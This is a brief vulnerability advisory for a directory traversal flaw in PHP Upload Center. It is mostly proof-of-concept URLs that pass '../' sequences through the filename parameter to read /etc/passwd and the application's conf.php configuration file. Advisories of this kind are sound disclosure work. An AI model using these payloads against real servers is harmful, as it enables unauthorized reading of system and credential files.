PHP Upload Center Directory Traversal Vulnerability

PHP Upload Center Directory Traversal Vulnerability

No exploit is required.

The following proof of concept examples are available:
http://www.example.com/upload/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd

http://www.example.com/instaladores/index.php?action=view&filename=../../../../../../../../../../../../../../../../etc/passwd

http://www.example.com/upload/index.php?action=view&filename=../include/conf.php

http://www.example.com/instaladores/index.php?action=view&filename=../include/conf.php